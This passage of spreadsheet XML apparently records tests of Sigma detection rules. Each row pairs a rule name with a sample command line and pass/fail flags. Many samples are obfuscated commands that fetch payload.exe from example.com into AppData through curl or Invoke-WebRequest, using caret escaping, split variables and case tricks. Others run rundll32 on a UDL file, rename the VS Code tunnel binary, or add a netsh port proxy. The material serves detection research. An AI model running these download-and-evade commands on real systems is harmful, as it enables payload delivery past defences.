      <c r="J230" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K230" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="231" ht="15.75" customHeight="1" s="42">
      <c r="A231" s="44" t="inlineStr">
        <is>
          <t>t1059.003</t>
        </is>
      </c>
      <c r="B231" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C231" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D231" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E231" s="44" t="inlineStr">
        <is>
          <t>cmd.exe -"c" "curl h^tt^ps://example.com/file.exe -o %AP^PDATA%\file.exe"</t>
        </is>
      </c>
      <c r="F231" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G231" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H231" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I231" s="44" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J231" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K231" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="232" ht="15.75" customHeight="1" s="42">
      <c r="A232" s="44" t="inlineStr">
        <is>
          <t>t1059.003</t>
        </is>
      </c>
      <c r="B232" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C232" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D232" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E232" s="44" t="inlineStr">
        <is>
          <t>cmd.exe -"c" "set protocol=http&amp;&amp; set url=://example.com/file.exe&amp;&amp; set dest=%USERPROFILE%\AppData\Roaming\file.exe&amp;&amp; call curl %protocol%%url% -o %dest%"</t>
        </is>
      </c>
      <c r="F232" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G232" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H232" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I232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232" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K232" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="233" ht="15.75" customHeight="1" s="42">
      <c r="A233" s="44" t="inlineStr">
        <is>
          <t>t1059.003</t>
        </is>
      </c>
      <c r="B233" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C233" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D233" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E233" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Invoke-WebRequest -Uri http://example.com/payload.exe -OutFile $env:APPDATA\payload.exe"</t>
        </is>
      </c>
      <c r="F233" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G233" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H233" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I233" s="44" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J233" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K233" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="234" ht="15.75" customHeight="1" s="42">
      <c r="A234" s="44" t="inlineStr">
        <is>
          <t>t1059.003</t>
        </is>
      </c>
      <c r="B234" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C234" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D234" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E234" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -cOmMand "Invoke-WebRequest -Uri http://example.com/payload.exe -OutFile $env:APPDATA\payload.exe"</t>
        </is>
      </c>
      <c r="F234" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G234" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H234" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I234" s="44" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J234" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K234" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="235" ht="15.75" customHeight="1" s="42">
      <c r="A235" s="44" t="inlineStr">
        <is>
          <t>t1059.003</t>
        </is>
      </c>
      <c r="B235" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C235" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D235" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E235" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -c "Invoke-WebRequest -Uri http://example.com/payload.exe -OutFile $env:APPDATA\payload.exe"</t>
        </is>
      </c>
      <c r="F235" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G235" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H235" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I235" s="44" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J235" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K235" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="236" ht="15.75" customHeight="1" s="42">
      <c r="A236" s="44" t="inlineStr">
        <is>
          <t>t1059.003</t>
        </is>
      </c>
      <c r="B236" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C236" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D236" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E236" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -CommaNd "Invoke-WebRequest -Uri http://example.com/payload.exe -OutFile $env:APPDATA\payload.exe"</t>
        </is>
      </c>
      <c r="F236" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G236" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H236" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I236" s="44" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J236" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K236" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="237" ht="15.75" customHeight="1" s="42">
      <c r="A237" s="44" t="inlineStr">
        <is>
          <t>t1059.003</t>
        </is>
      </c>
      <c r="B237" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C237" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D237" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E237" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -CommAnD "Invoke-WebRequest -Uri http://example.com/payload.exe -OutFile $env:APPDATA\payload.exe"</t>
        </is>
      </c>
      <c r="F237" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G237" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H237" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I237" s="44" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J237" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K237" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="238" ht="15.75" customHeight="1" s="42">
      <c r="A238" s="44" t="inlineStr">
        <is>
          <t>t1059.003</t>
        </is>
      </c>
      <c r="B238" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C238" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D238" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E238" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -COmMAND "Invoke-WebRequest -Uri http://example.com/payload.exe -OutFile $env:APPDATA\payload.exe"</t>
        </is>
      </c>
      <c r="F238" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G238" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H238" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I238" s="44" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J238" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K238" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="239" ht="15.75" customHeight="1" s="42">
      <c r="A239" s="44" t="inlineStr">
        <is>
          <t>t1059.003</t>
        </is>
      </c>
      <c r="B239" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C239" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D239" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E239" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -COMMANd "Invoke-WebRequest -Uri http://example.com/payload.exe -OutFile $env:APPDATA\payload.exe"</t>
        </is>
      </c>
      <c r="F239" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G239" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H239" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I239" s="44" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J239" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K239" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="240" ht="15.75" customHeight="1" s="42">
      <c r="A240" s="44" t="inlineStr">
        <is>
          <t>t1059.003</t>
        </is>
      </c>
      <c r="B240" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C240" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D240" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E240" s="44" t="inlineStr">
        <is>
          <t>cmd.exe -"c" "curl h^t^t^p^s^:^/^/[example.com/payload.exe]() -o %AppData%\payload.exe"</t>
        </is>
      </c>
      <c r="F240" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G240" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H240" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I240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40" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K240" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="241" ht="15.75" customHeight="1" s="42">
      <c r="A241" s="44" t="inlineStr">
        <is>
          <t>t1059.003</t>
        </is>
      </c>
      <c r="B241" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C241" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D241" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E241" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /"c" "curl h^t^t^p^s^:^/^/[example.com/payload.exe]() -o %AppData%\payload.exe"</t>
        </is>
      </c>
      <c r="F241" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G241" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H241" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I241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241" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K241" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="242" ht="15.75" customHeight="1" s="42">
      <c r="A242" s="44" t="inlineStr">
        <is>
          <t>t1059.003</t>
        </is>
      </c>
      <c r="B242" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C242" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D242" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E242" s="44" t="inlineStr">
        <is>
          <t>cmd.exe -"c" "curl http://example.com/payload.exe -o %USERPROFILE%\AppData\Roaming\payload.exe"</t>
        </is>
      </c>
      <c r="F242" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G242" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H242" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I242" s="44" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J242" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K242" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="243" ht="15.75" customHeight="1" s="42">
      <c r="A243" s="44" t="inlineStr">
        <is>
          <t>t1059.003</t>
        </is>
      </c>
      <c r="B243" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C243" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D243" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E243" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /"c" "curl http://example.com/payload.exe -o %USERPROFILE%\AppData\Roaming\payload.exe"</t>
        </is>
      </c>
      <c r="F243" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G243" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H243" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I243" s="44" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J243" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K243" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="244" ht="15.75" customHeight="1" s="42">
      <c r="A244" s="44" t="inlineStr">
        <is>
          <t>t1059.003</t>
        </is>
      </c>
      <c r="B244" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C244" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D244" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E244" s="44" t="inlineStr">
        <is>
          <t>cmd.exe -"c" "curl http://example.local/test.txt -o C:\Users\Public\AppData\Roaming\test.txt"</t>
        </is>
      </c>
      <c r="F244" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G244" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H244" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I244" s="44" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J244" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K244" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="245" ht="15.75" customHeight="1" s="42">
      <c r="A245" s="44" t="inlineStr">
        <is>
          <t>t1059.003</t>
        </is>
      </c>
      <c r="B245" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C245" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D245" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E245" s="44" t="inlineStr">
        <is>
          <t>cmd.exe -"c" "set A=App&amp;&amp; set D=Data&amp;&amp; cmd /c curl h^ttp://example.local/test.txt -o %USERPROFILE%\%A%%D%\Roaming\test.txt"</t>
        </is>
      </c>
      <c r="F245" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G245" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H245" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I245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45" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K245" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="246" ht="15.75" customHeight="1" s="42">
      <c r="A246" s="44" t="inlineStr">
        <is>
          <t>t1059.003</t>
        </is>
      </c>
      <c r="B246" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C246" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D246" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E246" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /"c" "set A=App&amp;&amp; set D=Data&amp;&amp; cmd /c curl h^ttp://example.local/test.txt -o %USERPROFILE%\%A%%D%\Roaming\test.txt"</t>
        </is>
      </c>
      <c r="F246" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G246" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H246" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I246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246" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K246" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="247" ht="15.75" customHeight="1" s="42">
      <c r="A247" s="44" t="inlineStr">
        <is>
          <t>t1059.003</t>
        </is>
      </c>
      <c r="B247" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C247" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D247" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E247" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /V:ON -"c" "curl http://example.com/payload.exe -o !AppData!\payload.exe"</t>
        </is>
      </c>
      <c r="F247" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G247" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H247" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I247" s="44" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J247" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K247" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="248" ht="15.75" customHeight="1" s="42">
      <c r="A248" s="44" t="inlineStr">
        <is>
          <t>t1059.003</t>
        </is>
      </c>
      <c r="B248" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C248" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D248" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E248" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /"V:ON" -"c" "curl http://example.com/payload.exe -o !AppData!\payload.exe"</t>
        </is>
      </c>
      <c r="F248" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G248" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H248" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I248" s="44" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J248" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K248" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="249" ht="15.75" customHeight="1" s="42">
      <c r="A249" s="44" t="inlineStr">
        <is>
          <t>t1059.003</t>
        </is>
      </c>
      <c r="B249" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C249" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D249" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E249" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /V:oN -"c" "curl http://example.com/payload.exe -o !AppData!\payload.exe"</t>
        </is>
      </c>
      <c r="F249" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G249" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H249" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I249" s="44" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J249" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K249" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="250" ht="15.75" customHeight="1" s="42">
      <c r="A250" s="44" t="inlineStr">
        <is>
          <t>t1071</t>
        </is>
      </c>
      <c r="B250" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_rundll32_udl_exec</t>
        </is>
      </c>
      <c r="C250" s="44" t="inlineStr">
        <is>
          <t>Potentially Suspicious Rundll32.EXE Execution of UDL File</t>
        </is>
      </c>
      <c r="D250" s="44" t="inlineStr">
        <is>
          <t>0ea52357-cd59-4340-9981-c46c7e900428</t>
        </is>
      </c>
      <c r="E250" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c rundll32.exe oledb32.dll,OpenDSLFile C:\Users\user\Downloads\test.udl</t>
        </is>
      </c>
      <c r="F250" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G250" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H250" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I250" s="43" t="n"/>
      <c r="J250" s="44" t="n">
        <v>1</v>
      </c>
      <c r="K250" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="251" ht="15.75" customHeight="1" s="42">
      <c r="A251" s="44" t="inlineStr">
        <is>
          <t>t1071</t>
        </is>
      </c>
      <c r="B251" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_rundll32_udl_exec</t>
        </is>
      </c>
      <c r="C251" s="44" t="inlineStr">
        <is>
          <t>Potentially Suspicious Rundll32.EXE Execution of UDL File</t>
        </is>
      </c>
      <c r="D251" s="44" t="inlineStr">
        <is>
          <t>0ea52357-cd59-4340-9981-c46c7e900428</t>
        </is>
      </c>
      <c r="E251" s="44" t="inlineStr">
        <is>
          <t>rundll32.exe oledb32.dll,OpenDSLFile "C:\Users\admin\Downloads\test.udl"</t>
        </is>
      </c>
      <c r="F251" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G251" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H251" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I251" s="43" t="n"/>
      <c r="J251" s="44" t="n">
        <v>1</v>
      </c>
      <c r="K251" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="252" ht="15.75" customHeight="1" s="42">
      <c r="A252" s="44" t="inlineStr">
        <is>
          <t>t1071</t>
        </is>
      </c>
      <c r="B252" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_rundll32_udl_exec</t>
        </is>
      </c>
      <c r="C252" s="44" t="inlineStr">
        <is>
          <t>Potentially Suspicious Rundll32.EXE Execution of UDL File</t>
        </is>
      </c>
      <c r="D252" s="44" t="inlineStr">
        <is>
          <t>0ea52357-cd59-4340-9981-c46c7e900428</t>
        </is>
      </c>
      <c r="E252" s="44" t="inlineStr">
        <is>
          <t>rundll32.exe oledb32.dll,OpenDSLFile C:\ProgramData\test.udl</t>
        </is>
      </c>
      <c r="F252" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G252" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H252" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I252" s="43" t="n"/>
      <c r="J252" s="44" t="n">
        <v>1</v>
      </c>
      <c r="K252" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="253" ht="15.75" customHeight="1" s="42">
      <c r="A253" s="43" t="n"/>
      <c r="B253" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_vscode_tunnel_service_install</t>
        </is>
      </c>
      <c r="C253" s="44" t="inlineStr">
        <is>
          <t>Visual Studio Code Tunnel Service Installation</t>
        </is>
      </c>
      <c r="D253" s="44" t="inlineStr">
        <is>
          <t>30bf1789-379d-4fdc-900f-55cd0a90a801</t>
        </is>
      </c>
      <c r="E253" s="44" t="inlineStr">
        <is>
          <t>copy code.exe not_code.exe &amp;&amp; not_code.exe tunnel service internal-run --log-file bypass.log</t>
        </is>
      </c>
      <c r="F253" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G253" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H253" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I253" s="43" t="n"/>
      <c r="J253" s="44" t="n">
        <v>1</v>
      </c>
      <c r="K253" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="254" ht="15.75" customHeight="1" s="42">
      <c r="A254" s="43" t="inlineStr">
        <is>
          <t>t1090</t>
        </is>
      </c>
      <c r="B254" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_netsh_port_forwarding</t>
        </is>
      </c>
      <c r="C254" s="44" t="inlineStr">
        <is>
          <t>New Port Forwarding Rule Added Via Netsh.EXE</t>
        </is>
      </c>
      <c r="D254" s="44" t="inlineStr">
        <is>
          <t>322ed9ec-fcab-4f67-9a34-e7c6aef43614</t>
        </is>
      </c>
      <c r="E254" s="43" t="inlineStr">
        <is>
          <t>netsh.exe interface portproxy add v4tov4 listenport=1337 connect""port=1337 connectaddress=127.0.0.1</t>
        </is>
      </c>
      <c r="F254" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G254" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H254" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I254" s="43" t="inlineStr">
        <is>
          <t>New Port Forwarding Rule Added Via Netsh.EXE (322ed9ec-fcab-4f67-9a34-e7c6aef43614)</t>
        </is>
      </c>
      <c r="J254" s="43" t="n">
        <v>2</v>
      </c>
      <c r="K254" s="43" t="b">
